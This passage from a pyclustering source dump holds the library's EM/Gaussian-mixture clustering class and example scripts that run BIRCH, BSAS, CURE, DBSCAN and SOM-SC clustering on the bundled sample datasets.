ellipse = patches.Ellipse((x, y), width, height, alpha=0.2, angle=-angle, linewidth=2, fill=True, zorder=2, color=color)
ax.add_patch(ellipse)
class ema:
"""!
@brief Expectation-Maximization clustering algorithm for Gaussian Mixture Model (GMM).
@details The algorithm provides only clustering services (unsupervised learning).
Here is an example of the data clustering process:
@code
from pyclustering.cluster.ema import ema, ema_visualizer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
# Read data from text file.
sample = read_sample(FCPS_SAMPLES.SAMPLE_LSUN)
# Create EM algorithm to allocate three clusters.
ema_instance = ema(sample, 3)
# Run clustering process.
ema_instance.process()
# Get clustering results.
clusters = ema_instance.get_clusters()
covariances = ema_instance.get_covariances()
means = ema_instance.get_centers()
# Visualize obtained clustering results.
ema_visualizer.show_clusters(clusters, sample, covariances, means)
@endcode
Here are the clustering results of the Expectation-Maximization clustering algorithm for the popular sample 'OldFaithful'.
Initial random means and covariances were used in the example. The first step is presented on the left side of the figure and
the final result (the last step) is on the right side:
@image html ema_old_faithful_clustering.png
@see ema_visualizer
@see ema_observer
"""
def __init__(self, data, amount_clusters, means=None, variances=None, observer=None, tolerance=0.00001, iterations=100):
"""!
@brief Initializes Expectation-Maximization algorithm for cluster analysis.
@param[in] data (list): Dataset that should be analysed and where each point (object) is represented by the list of coordinates.
@param[in] amount_clusters (uint): Amount of clusters that should be allocated.
@param[in] means (list): Initial means of clusters (amount of means should be equal to amount of clusters for allocation).
If this parameter is 'None' then K-Means algorithm with K-Means++ method will be used for initialization by default.
@param[in] variances (list): Initial cluster variances (or covariances in case of multi-dimensional data). Amount of
covariances should be equal to amount of clusters that should be allocated. If this parameter is 'None' then
K-Means algorithm with K-Means++ method will be used for initialization by default.
@param[in] observer (ema_observer): Observer for gathering information about clustering process.
@param[in] tolerance (float): Defines stop condition of the algorithm (when the difference between current and
previous log-likelihood estimation is less than 'tolerance' then clustering is over).
@param[in] iterations (uint): Additional stop condition parameter that defines maximum number of steps that can be
performed by the algorithm during clustering process.
"""
self.__data = numpy.array(data)
self.__amount_clusters = amount_clusters
self.__tolerance = tolerance
self.__iterations = iterations
self.__observer = observer
self.__means = means
self.__variances = variances
self.__verify_arguments()
if (means is None) or (variances is None):
self.__means, self.__variances = ema_initializer(data, amount_clusters).initialize(ema_init_type.KMEANS_INITIALIZATION)
if len(self.__means) != amount_clusters:
self.__amount_clusters = len(self.__means)
self.__rc = [ [0.0] * len(self.__data) for _ in range(amount_clusters) ]
self.__pic = [1.0] * amount_clusters
self.__clusters = []
self.__gaussians = [ [] for _ in range(amount_clusters) ]
self.__stop = False
def process(self):
"""!
@brief Run clustering process of the algorithm.
@return (ema) Returns itself (EMA instance).
"""
previous_likelihood = -200000
current_likelihood = -100000
current_iteration = 0
while(self.__stop is False) and (abs(previous_likelihood - current_likelihood) > self.__tolerance) and (current_iteration < self.__iterations):
self.__expectation_step()
self.__maximization_step()
current_iteration += 1
self.__extract_clusters()
self.__notify()
previous_likelihood = current_likelihood
current_likelihood = self.__log_likelihood()
self.__stop = self.__get_stop_condition()
self.__normalize_probabilities()
return self
def get_clusters(self):
"""!
@return (list) Allocated clusters where each cluster is represented by a list of indexes of points from the dataset,
for example, two clusters may have the following representation [[0, 1, 4], [2, 3, 5, 6]].
"""
return self.__clusters
def get_centers(self):
"""!
@return (list) Corresponding centers (means) of clusters.
"""
return self.__means
def get_covariances(self):
"""!
@return (list) Corresponding variances (or covariances in case of multi-dimensional data) of clusters.
"""
return self.__variances
def get_probabilities(self):
"""!
@brief Returns a 2-dimensional list with the probability that each object from the data belongs to each cluster,
where the first index is for the cluster and the second is for the point.
@code
# Get belonging probabilities
probabilities = ema_instance.get_probabilities();
# Show probability of the fifth element in the first and in the second cluster
index_point = 5;
print("Probability in the first cluster:", probabilities[0][index_point]);
print("Probability in the second cluster:", probabilities[1][index_point]);
@endcode
@endcode
@return (list) 2-dimensional list with belong probability of each object from data to cluster.
"""
return self.__rc
def __erase_empty_clusters(self):
clusters, means, variances, pic, gaussians, rc = [], [], [], [], [], []
for index_cluster in range(len(self.__clusters)):
if len(self.__clusters[index_cluster]) > 0:
clusters.append(self.__clusters[index_cluster])
means.append(self.__means[index_cluster])
variances.append(self.__variances[index_cluster])
pic.append(self.__pic[index_cluster])
gaussians.append(self.__gaussians[index_cluster])
rc.append(self.__rc[index_cluster])
if len(self.__clusters) != len(clusters):
self.__clusters, self.__means, self.__variances, self.__pic = clusters, means, variances, pic
self.__gaussians, self.__rc = gaussians, rc
self.__amount_clusters = len(self.__clusters)
def __notify(self):
if self.__observer is not None:
self.__observer.notify(self.__means, self.__variances, self.__clusters)
def __extract_clusters(self):
self.__clusters = [[] for _ in range(self.__amount_clusters)]
for index_point in range(len(self.__data)):
candidates = []
for index_cluster in range(self.__amount_clusters):
candidates.append((index_cluster, self.__rc[index_cluster][index_point]))
index_winner = max(candidates, key=lambda candidate: candidate[1])[0]
self.__clusters[index_winner].append(index_point)
self.__erase_empty_clusters()
def __log_likelihood(self):
likelihood = 0.0
for index_point in range(len(self.__data)):
particle = 0.0
for index_cluster in range(self.__amount_clusters):
particle += self.__pic[index_cluster] * self.__gaussians[index_cluster][index_point]
if particle > 0.0:
likelihood += numpy.log(particle)
return likelihood
def __probabilities(self, index_cluster, index_point):
divider = 0.0
for i in range(self.__amount_clusters):
divider += self.__pic[i] * self.__gaussians[i][index_point]
if (divider != 0.0) and (divider != float('inf')):
return self.__pic[index_cluster] * self.__gaussians[index_cluster][index_point] / divider
return 1.0
def __expectation_step(self):
self.__gaussians = [ [] for _ in range(self.__amount_clusters) ]
for index in range(self.__amount_clusters):
self.__gaussians[index] = gaussian(self.__data, self.__means[index], self.__variances[index])
self.__rc = [ [0.0] * len(self.__data) for _ in range(self.__amount_clusters) ]
for index_cluster in range(self.__amount_clusters):
for index_point in range(len(self.__data)):
self.__rc[index_cluster][index_point] = self.__probabilities(index_cluster, index_point)
def __maximization_step(self):
self.__pic = []
self.__means = []
self.__variances = []
amount_impossible_clusters = 0
for index_cluster in range(self.__amount_clusters):
mc = numpy.sum(self.__rc[index_cluster])
if mc == 0.0:
amount_impossible_clusters += 1
continue
self.__pic.append( mc / len(self.__data) )
self.__means.append( self.__update_mean(self.__rc[index_cluster], mc) )
self.__variances.append( self.__update_covariance(self.__means[-1], self.__rc[index_cluster], mc) )
self.__amount_clusters -= amount_impossible_clusters
def __get_stop_condition(self):
for covariance in self.__variances:
if numpy.linalg.norm(covariance) == 0.0:
return True
return False
def __update_covariance(self, means, rc, mc):
covariance = 0.0
for index_point in range(len(self.__data)):
deviation = numpy.array([self.__data[index_point] - means])
covariance += rc[index_point] * deviation.T.dot(deviation)
covariance = covariance / mc
return covariance
def __update_mean(self, rc, mc):
mean = 0.0
for index_point in range(len(self.__data)):
mean += rc[index_point] * self.__data[index_point]
mean = mean / mc
return mean
def __normalize_probabilities(self):
for index_point in range(len(self.__data)):
probability = 0.0
for index_cluster in range(len(self.__clusters)):
probability += self.__rc[index_cluster][index_point]
if abs(probability - 1.0) > 0.000001:
self.__normalize_probability(index_point, probability)
def __normalize_probability(self, index_point, probability):
if probability == 0.0:
return
normalization = 1.0 / probability
for index_cluster in range(len(self.__clusters)):
self.__rc[index_cluster][index_point] *= normalization
def __verify_arguments(self):
"""!
@brief Verify input parameters for the algorithm and throw exception in case of incorrectness.
"""
if len(self.__data) == 0:
raise ValueError("Input data is empty (size: '%d')." % len(self.__data))
if self.__amount_clusters < 1:
raise ValueError("Amount of clusters (current value '%d') should be greater or equal to 1." %
self.__amount_clusters)
```
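Beyond the visualizer-driven examples in the docstrings above, a minimal non-graphical run of the `ema` class can show how `get_probabilities()` relates to the hard assignment of `get_clusters()` (toy data; the exact probabilities are hedged since the EM initialization is randomized):
```python
# Clustering a tiny two-blob dataset with the ema class above (illustrative data).
data = [[0.0, 0.1], [0.2, 0.0], [0.1, 0.2],
        [5.0, 5.1], [5.2, 4.9], [4.9, 5.0]]
instance = ema(data, 2).process()
clusters = instance.get_clusters()            # e.g. [[0, 1, 2], [3, 4, 5]]
probabilities = instance.get_probabilities()  # probabilities[cluster][point]
for index_cluster, cluster in enumerate(clusters):
    for index_point in cluster:
        # For well-separated blobs each membership probability is close to 1.0.
        print(index_point, probabilities[index_cluster][index_point])
```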
#### File: cluster/examples/birch_examples.py
```python
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.birch import birch
from pyclustering.container.cftree import measurement_type
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
def template_clustering(number_clusters, path, branching_factor=50, max_node_entries=100, initial_diameter=0.5, type_measurement=measurement_type.CENTROID_EUCLIDEAN_DISTANCE, entry_size_limit=200, diameter_multiplier=1.5, show_result=True):
print("Sample: ", path)
sample = read_sample(path)
birch_instance = birch(sample, number_clusters, branching_factor, max_node_entries, initial_diameter,
type_measurement, entry_size_limit, diameter_multiplier)
birch_instance.process()
clusters = birch_instance.get_clusters()
if show_result is True:
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.show()
return sample, clusters
def cluster_sample1():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 5, 5, 0.1, measurement_type.CENTROID_EUCLIDEAN_DISTANCE, 2) # only two entries available
def cluster_sample2():
template_clustering(3, SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
def cluster_sample3():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
def cluster_sample4():
template_clustering(5, SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
def cluster_sample5():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
def cluster_sample7():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE7)
def cluster_sample8():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE8)
def cluster_elongate():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_ELONGATE)
def cluster_lsun():
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN)
def cluster_lsun_rebuilt():
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN, entry_size_limit=20, diameter_multiplier=1.5)
def cluster_target():
template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET)
def cluster_two_diamonds():
template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS)
def cluster_wing_nut():
template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT)
def cluster_chainlink():
template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK)
def cluster_hepta():
template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA)
def cluster_tetra():
template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA)
def cluster_engy_time():
template_clustering(2, FCPS_SAMPLES.SAMPLE_ENGY_TIME)
def experiment_execution_time(ccore=False):
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
template_clustering(3, SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
template_clustering(5, SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_ELONGATE)
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN)
template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET)
template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS)
template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT)
template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK)
template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA)
template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA)
template_clustering(2, FCPS_SAMPLES.SAMPLE_ATOM)
def display_fcps_clustering_results():
(lsun, lsun_clusters) = template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN, show_result=False)
(target, target_clusters) = template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET, show_result=False)
(two_diamonds, two_diamonds_clusters) = template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, show_result=False)
(wing_nut, wing_nut_clusters) = template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT, show_result=False)
(chainlink, chainlink_clusters) = template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK, show_result=False)
(hepta, hepta_clusters) = template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA, show_result=False)
(tetra, tetra_clusters) = template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA, show_result=False)
(atom, atom_clusters) = template_clustering(2, FCPS_SAMPLES.SAMPLE_ATOM, show_result=False)
visualizer = cluster_visualizer(8, 4)
visualizer.append_clusters(lsun_clusters, lsun, 0)
visualizer.append_clusters(target_clusters, target, 1)
visualizer.append_clusters(two_diamonds_clusters, two_diamonds, 2)
visualizer.append_clusters(wing_nut_clusters, wing_nut, 3)
visualizer.append_clusters(chainlink_clusters, chainlink, 4)
visualizer.append_clusters(hepta_clusters, hepta, 5)
visualizer.append_clusters(tetra_clusters, tetra, 6)
visualizer.append_clusters(atom_clusters, atom, 7)
visualizer.show()
cluster_sample1()
cluster_sample2()
cluster_sample3()
cluster_sample4()
cluster_sample5()
cluster_sample7()
cluster_sample8()
cluster_elongate()
cluster_lsun()
cluster_lsun_rebuilt()
cluster_target()
cluster_two_diamonds()
cluster_wing_nut()
cluster_chainlink()
cluster_hepta()
cluster_tetra()
cluster_engy_time()
experiment_execution_time(True) # C++ code + Python env.
display_fcps_clustering_results()
```
#### File: cluster/examples/bsas_examples.py
```python
from pyclustering.cluster import cluster_visualizer;
from pyclustering.cluster.bsas import bsas, bsas_visualizer;
from pyclustering.samples.definitions import SIMPLE_SAMPLES;
from pyclustering.utils import read_sample;
from pyclustering.utils.metric import distance_metric, type_metric;
def template_clustering(path, amount, threshold, **kwargs):
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE));
ccore = kwargs.get('ccore', False);
draw = kwargs.get('draw', True);
sample = read_sample(path);
print("Sample: ", path);
bsas_instance = bsas(sample, amount, threshold, ccore=ccore, metric=metric);
bsas_instance.process();
clusters = bsas_instance.get_clusters();
representatives = bsas_instance.get_representatives();
if draw is True:
bsas_visualizer.show_clusters(sample, clusters, representatives);
def cluster_sample1():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0);
def cluster_sample2():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1.0);
def cluster_sample3():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 1.0);
def cluster_sample4():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5, 1.0);
def cluster_sample5():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 4, 1.0);
def cluster_sample6():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, 2, 1.0);
def cluster_elongate():
template_clustering(SIMPLE_SAMPLES.SAMPLE_ELONGATE, 2, 1.0);
cluster_sample1();
cluster_sample2();
cluster_sample3();
cluster_sample4();
cluster_sample5();
cluster_sample6();
cluster_elongate();
```
#### File: cluster/examples/cure_examples.py
```python
from pyclustering.utils import read_sample
from pyclustering.utils import timedcall
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.samples.definitions import FCPS_SAMPLES
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.cure import cure
def template_clustering(number_clusters, path, number_represent_points=5, compression=0.5, draw=True, ccore_flag=True):
sample = read_sample(path)
cure_instance = cure(sample, number_clusters, number_represent_points, compression, ccore_flag)
(ticks, _) = timedcall(cure_instance.process)
clusters = cure_instance.get_clusters()
representors = cure_instance.get_representors()
means = cure_instance.get_means()
print("Sample: ", path, "\t\tExecution time: ", ticks, "\n")
#print([len(cluster) for cluster in clusters])
if draw is True:
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
for cluster_index in range(len(clusters)):
visualizer.append_cluster_attribute(0, cluster_index, representors[cluster_index], '*', 10)
visualizer.append_cluster_attribute(0, cluster_index, [ means[cluster_index] ], 'o')
visualizer.show()
def cluster_sample1():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
def cluster_sample2():
template_clustering(3, SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
def cluster_sample3():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
def cluster_sample4():
template_clustering(5, SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
def cluster_sample5():
template_clustering(4, SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
def cluster_sample6():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_SIMPLE6)
def cluster_elongate():
template_clustering(2, SIMPLE_SAMPLES.SAMPLE_ELONGATE)
def cluster_lsun():
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN, 5, 0.3)
def cluster_target():
template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET, 10, 0.3)
def cluster_two_diamonds():
template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 5, 0.3)
def cluster_wing_nut(ccore_flag=True):
template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT, 4, 0.3, ccore_flag=ccore_flag)
def cluster_chainlink():
template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK, 30, 0.2)
def cluster_hepta():
template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA)
def cluster_tetra():
template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA)
def cluster_engy_time():
template_clustering(2, FCPS_SAMPLES.SAMPLE_ENGY_TIME, 50, 0.5)
def cluster_golf_ball():
template_clustering(1, FCPS_SAMPLES.SAMPLE_GOLF_BALL)
def cluster_atom():
"Impossible to obtain parameters that satisfy us, it seems to me that compression = 0.2 is key parameter here, because results of clustering doesn't depend on number of represented points, except 0."
"Thus the best parameters is following: number of points for representation: [5, 400]; compression: [0.2, 0.204]"
"Results of clustering is not so dramatically, but clusters are not allocated properly"
template_clustering(2, FCPS_SAMPLES.SAMPLE_ATOM, 20, 0.2)
def experiment_execution_time(draw, ccore):
template_clustering(3, FCPS_SAMPLES.SAMPLE_LSUN, 5, 0.3, draw, ccore)
template_clustering(6, FCPS_SAMPLES.SAMPLE_TARGET, 10, 0.3, draw, ccore)
template_clustering(2, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 5, 0.3, draw, ccore)
template_clustering(2, FCPS_SAMPLES.SAMPLE_WING_NUT, 1, 1, draw, ccore)
template_clustering(2, FCPS_SAMPLES.SAMPLE_CHAINLINK, 5, 0.5, draw, ccore)
template_clustering(4, FCPS_SAMPLES.SAMPLE_TETRA, 5, 0.5, draw, ccore)
template_clustering(7, FCPS_SAMPLES.SAMPLE_HEPTA, 5, 0.5, draw, ccore)
template_clustering(2, FCPS_SAMPLES.SAMPLE_ATOM, 20, 0.2)
cluster_sample1()
cluster_sample2()
cluster_sample3()
cluster_sample4()
cluster_sample5()
cluster_sample6()
cluster_elongate()
cluster_lsun()
cluster_target()
cluster_two_diamonds()
cluster_wing_nut()
cluster_chainlink()
cluster_hepta()
cluster_tetra()
cluster_atom()
cluster_engy_time()
cluster_golf_ball()
experiment_execution_time(True, False)
experiment_execution_time(True, True)
```
#### File: cluster/examples/dbscan_examples.py
```python
import random
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.dbscan import dbscan
from pyclustering.utils import read_sample
from pyclustering.utils import timedcall
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES
def template_clustering(radius, neighb, path, invisible_axes = False, ccore = True, show = True):
sample = read_sample(path)
dbscan_instance = dbscan(sample, radius, neighb, ccore)
(ticks, _) = timedcall(dbscan_instance.process)
clusters = dbscan_instance.get_clusters()
noise = dbscan_instance.get_noise()
print([len(cluster) for cluster in clusters])
if show:
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.append_cluster(noise, sample, marker = 'x')
visualizer.show()
print("Sample: ", path, "\t\tExecution time: ", ticks, "\n")
return sample, clusters, noise
def cluster_sample1():
template_clustering(0.4, 2, SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
def cluster_sample2():
template_clustering(1, 2, SIMPLE_SAMPLES.SAMPLE_SIMPLE2)
def cluster_sample3():
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE3)
def cluster_sample4():
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE4)
def cluster_sample5():
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE5)
def cluster_sample7():
template_clustering(1.0, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE7)
def cluster_sample8():
template_clustering(1.0, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE8)
def cluster_elongate():
template_clustering(0.5, 3, SIMPLE_SAMPLES.SAMPLE_ELONGATE)
def cluster_lsun():
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_LSUN)
def cluster_target():
template_clustering(0.5, 2, FCPS_SAMPLES.SAMPLE_TARGET)
def cluster_two_diamonds():
"It's hard to choose properly parameters, but it's OK"
template_clustering(0.15, 7, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS)
def cluster_wing_nut():
"It's hard to choose properly parameters, but it's OK"
template_clustering(0.25, 2, FCPS_SAMPLES.SAMPLE_WING_NUT)
def cluster_chainlink():
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_CHAINLINK)
def cluster_hepta():
template_clustering(1, 3, FCPS_SAMPLES.SAMPLE_HEPTA)
def cluster_golf_ball():
"Toooooooooooo looooong"
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_GOLF_BALL)
def cluster_atom():
template_clustering(15, 3, FCPS_SAMPLES.SAMPLE_ATOM)
def cluster_tetra():
template_clustering(0.4, 3, FCPS_SAMPLES.SAMPLE_TETRA)
def cluster_engy_time():
template_clustering(0.2, 20, FCPS_SAMPLES.SAMPLE_ENGY_TIME)
def experiment_execution_time(ccore = False):
"Performance measurement"
template_clustering(0.5, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE1, False, ccore)
template_clustering(1, 2, SIMPLE_SAMPLES.SAMPLE_SIMPLE2, False, ccore)
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE3, False, ccore)
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE4, False, ccore)
template_clustering(0.7, 3, SIMPLE_SAMPLES.SAMPLE_SIMPLE5, False, ccore)
template_clustering(0.5, 3, SIMPLE_SAMPLES.SAMPLE_ELONGATE, False, ccore)
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_LSUN, False, ccore)
template_clustering(0.5, 2, FCPS_SAMPLES.SAMPLE_TARGET, False, ccore)
template_clustering(0.15, 7, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, ccore)
template_clustering(0.25, 2, FCPS_SAMPLES.SAMPLE_WING_NUT, False, ccore)
template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_CHAINLINK, False, ccore)
template_clustering(1, 3, FCPS_SAMPLES.SAMPLE_HEPTA, False, ccore)
template_clustering(0.4, 3, FCPS_SAMPLES.SAMPLE_TETRA, False, ccore)
template_clustering(15, 3, FCPS_SAMPLES.SAMPLE_ATOM, False, ccore)
def display_fcps_clustering_results():
(lsun, lsun_clusters, _) = template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_LSUN, False, True, False)
(target, target_clusters, _) = template_clustering(0.5, 2, FCPS_SAMPLES.SAMPLE_TARGET, False, True, False)
(two_diamonds, two_diamonds_clusters, _) = template_clustering(0.15, 7, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(wing_nut, wing_nut_clusters, _) = template_clustering(0.25, 2, FCPS_SAMPLES.SAMPLE_WING_NUT, False, True, False)
(chainlink, chainlink_clusters, _) = template_clustering(0.5, 3, FCPS_SAMPLES.SAMPLE_CHAINLINK, False, True, False)
(hepta, hepta_clusters, _) = template_clustering(1, 3, FCPS_SAMPLES.SAMPLE_HEPTA, False, True, False)
(tetra, tetra_clusters, _) = template_clustering(0.4, 3, FCPS_SAMPLES.SAMPLE_TETRA, False, True, False)
(atom, atom_clusters, _) = template_clustering(15, 3, FCPS_SAMPLES.SAMPLE_ATOM, False, True, False)
visualizer = cluster_visualizer(8, 4)
visualizer.append_clusters(lsun_clusters, lsun, 0)
visualizer.append_clusters(target_clusters, target, 1)
visualizer.append_clusters(two_diamonds_clusters, two_diamonds, 2)
visualizer.append_clusters(wing_nut_clusters, wing_nut, 3)
visualizer.append_clusters(chainlink_clusters, chainlink, 4)
visualizer.append_clusters(hepta_clusters, hepta, 5)
visualizer.append_clusters(tetra_clusters, tetra, 6)
visualizer.append_clusters(atom_clusters, atom, 7)
visualizer.show()
def display_fcps_dependence_clustering_results():
(two_diamonds, two_diamonds_clusters_1, _) = template_clustering(0.15, 4, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_2, _) = template_clustering(0.15, 5, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_3, _) = template_clustering(0.15, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_4, _) = template_clustering(0.15, 7, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_5, _) = template_clustering(0.10, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_6, _) = template_clustering(0.12, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_7, _) = template_clustering(0.15, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
(two_diamonds, two_diamonds_clusters_8, _) = template_clustering(0.17, 6, FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, False, True, False)
visualizer = cluster_visualizer(8, 4)
visualizer.append_clusters(two_diamonds_clusters_1, two_diamonds, 0)
visualizer.append_clusters(two_diamonds_clusters_2, two_diamonds, 1)
visualizer.append_clusters(two_diamonds_clusters_3, two_diamonds, 2)
visualizer.append_clusters(two_diamonds_clusters_4, two_diamonds, 3)
visualizer.append_clusters(two_diamonds_clusters_5, two_diamonds, 4)
visualizer.append_clusters(two_diamonds_clusters_6, two_diamonds, 5)
visualizer.append_clusters(two_diamonds_clusters_7, two_diamonds, 6)
visualizer.append_clusters(two_diamonds_clusters_8, two_diamonds, 7)
visualizer.show()
def clustering_random_points(amount, ccore):
sample = [ [ random.random(), random.random() ] for _ in range(amount) ]
dbscan_instance = dbscan(sample, 0.05, 20, ccore)
(ticks, _) = timedcall(dbscan_instance.process)
print("Execution time ("+ str(amount) +" 2D-points):", ticks)
def performance_measure_random_points(ccore):
clustering_random_points(1000, ccore)
clustering_random_points(2000, ccore)
clustering_random_points(3000, ccore)
clustering_random_points(4000, ccore)
clustering_random_points(5000, ccore)
clustering_random_points(10000, ccore)
clustering_random_points(20000, ccore)
cluster_sample1()
cluster_sample2()
cluster_sample3()
cluster_sample4()
cluster_sample5()
cluster_sample7()
cluster_sample8()
cluster_elongate()
cluster_lsun()
cluster_target()
cluster_two_diamonds()
cluster_wing_nut()
cluster_chainlink()
cluster_hepta()
# cluster_golf_ball()  # commented out due to long processing time - it works correctly
cluster_atom()
cluster_tetra()
cluster_engy_time()
experiment_execution_time(False) # Python code
experiment_execution_time(True) # C++ code + Python env.
display_fcps_clustering_results()
display_fcps_dependence_clustering_results()
performance_measure_random_points(False)
performance_measure_random_points(True)
```
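For readers who want the DBSCAN workflow without the surrounding harness, a minimal sketch follows; it reuses only the calls demonstrated in `template_clustering` above (`process()`, `get_clusters()`, `get_noise()`), with the radius and neighbor count from the 'TwoDiamonds' example.
```python
from pyclustering.cluster.dbscan import dbscan
from pyclustering.samples.definitions import FCPS_SAMPLES
from pyclustering.utils import read_sample

sample = read_sample(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS)
dbscan_instance = dbscan(sample, 0.15, 7)    # connectivity radius and minimum neighbors
dbscan_instance.process()

clusters = dbscan_instance.get_clusters()    # lists of point indexes
noise = dbscan_instance.get_noise()          # indexes of points classified as outliers
print("clusters:", [len(cluster) for cluster in clusters], "noise points:", len(noise))
```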
#### File: cluster/examples/somsc_examples.py
```python
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES;
from pyclustering.cluster import cluster_visualizer;
from pyclustering.cluster.somsc import somsc;
from pyclustering.utils import read_sample;
from pyclustering.utils import timedcall;
def template_clustering(path, amount_clusters, epouch = 100, ccore = True):
sample = read_sample(path);
somsc_instance = somsc(sample, amount_clusters, epouch, ccore);
(ticks, _) = timedcall(somsc_instance.process);
clusters = somsc_instance.get_clusters();
print("Sample: ", path, "\t\tExecution time: ", ticks, "\n");
visualizer = cluster_visualizer();
visualizer.append_clusters(clusters, sample);
visualizer.show();
def cluster_sample1():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2);
def cluster_sample2():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3);
def cluster_sample3():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4);
def cluster_sample4():
